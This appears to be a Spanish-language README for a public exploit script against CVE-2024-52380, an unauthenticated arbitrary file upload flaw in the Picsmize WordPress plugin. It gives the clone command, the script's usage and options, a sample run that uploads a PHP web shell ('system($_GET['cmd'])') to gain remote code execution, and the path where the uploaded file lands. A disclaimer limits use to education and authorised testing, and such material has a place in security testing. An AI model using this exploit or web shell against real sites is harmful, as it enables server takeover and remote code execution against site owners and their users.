
El plugin Picsmize para WordPress es vulnerable a subidas de archivos arbitrarias.
El plugin Picsmize para WordPress es vulnerable a subidas de archivos arbitrarias.
Este script explota una vulnerabilidad (CVE-2024-52380) en el plugin Picsmize para WordPress, permitiendo a atacantes no autenticados realizar subidas de archivos arbitrarias. Esta vulnerabilidad existe en todas las versiones de Picsmize hasta la 1.0.0 inclusive. La explotación de esta vulnerabilidad puede resultar en la ejecución remota de código en el servidor objetivo.
requests (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
El script proporciona dos argumentos de línea de comandos para facilitar su uso:
-u / --url (obligatorio):
-u http://example.com
-c / --content (opcional):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: Directorio raíz del sitio WordPress.wp-content/uploads: Directorio por defecto para subidas de medios en WordPress.2025/01: La estructura de directorios corresponde al año (2025) y mes (enero) según la configuración de fecha del servidor.Este script está destinado únicamente a fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal y poco ético.